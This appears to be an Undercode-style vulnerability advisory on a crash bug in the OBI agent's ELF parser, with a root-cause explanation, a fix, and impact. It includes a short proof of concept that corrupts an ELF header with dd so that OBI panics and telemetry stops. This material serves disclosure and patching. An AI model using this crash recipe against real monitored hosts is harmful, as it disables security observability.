Listen to this Post
The vulnerability arises because OBI’s lightweight ELF parser (fastelf) trusts data from a potentially malicious executable without performing critical validation checks.
During process discovery, OBI reads a binary’s ELF structure to determine its language. The `NewElfContextFromData` function directly trusts the `Shoff` (section header offset), `Shnum` (number of section headers), and `Phnum` (number of program headers) from the ELF header. These values are converted to integers and used to populate internal sections and segments. No validation is performed to ensure these offsets point within the bounds of the file’s data or that the size calculations will not overflow.
Later, when OBI needs to inspect the binary’s symbols, the `matchExeSymbols` function iterates over these sections. It uses offsets and names derived from the `fastelf` context without checking if the section pointers are `nil` or if the offsets are out-of-range. A malformed ELF can set these values to point to arbitrary locations, including `nil` or invalid memory.
The execution path leads to unsafe functions like `GetCStringUnsafe` and ReadStruct. These functions perform pointer arithmetic, dereferencing, and slicing based on the attacker-controlled offsets from the ELF file. They do not guard against out-of-range or negative offsets.
Consequently, when OBI parses a crafted ELF file, it will attempt to dereference an invalid pointer or slice outside the bounds of a string table. This operation triggers a runtime panic, causing the OBI agent to crash. This crash halts all telemetry collection on the affected host, leading to a local denial of service.
Platform: OBI (Linux)
Version: v0.0.0-rc.1+build to <0.9.0
Vulnerability : Panic on invalid ELF
Severity: Moderate
date: 2026-05-18
Prediction: Patch in v0.9.0 (already applied)
What Undercode Say:
Analytics of the vulnerability suggests the fix involved adding validation checks in the ELF parsing logic. The patch likely ensures all section and string table offsets are bounds-checked before use, preventing `nil` pointer dereferences and out-of-bounds slicing.
Recreating the vulnerable environment and PoC:
Checkout the vulnerable release
git checkout v0.0.0-rc.1+build
Build the vulnerable agent
make build
Create a minimal valid ELF binary
cat > /tmp/hello.c <<'EOF'
int main(void) { return 0; }
EOF
cc -o /tmp/hello /tmp/hello.c
Corrupt the ELF header by writing 0xffff at the e_shoff offset (0x3c)
cp /tmp/hello /tmp/hello-bad
printf '\xff\xff' | dd of=/tmp/hello-bad bs=1 seek=$((0x3c)) conv=notrunc
Execute the malformed binary in the background
chmod +x /tmp/hello-bad
/tmp/hello-bad &
Run the vulnerable OBI agent to trigger the panic
sudo ./bin/obi
How Exploit:
A local attacker can exploit this by crafting a malformed ELF executable. This executable is then placed on the monitored host and executed. When the OBI agent automatically scans running processes to determine their language (a standard part of its operation), the malicious ELF file will be parsed. The attacker-controlled, invalid section offset in the ELF header will cause OBI to dereference a `nil` pointer or access an out-of-bounds memory address during symbol matching. This immediate panic crashes the agent.
Protection from this CVE
To protect against this vulnerability, upgrade OBI to version v0.9.0 or later, which includes the patch that validates ELF headers and offsets. As a workaround, if an immediate upgrade is not possible, restrict local execution permissions to prevent untrusted users from running arbitrary binaries on hosts where OBI is deployed, as the attacker needs to execute a binary to trigger the crash.
Impact
The impact is a local Denial of Service (DoS). Any user with the ability to execute a binary on a monitored host can crash the OBI agent. This crash halts all telemetry collection—including metrics, traces, and logs—for all processes on that host until the OBI service is manually restarted. This creates a significant blind spot for monitoring and can be used to disrupt observability in critical environments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

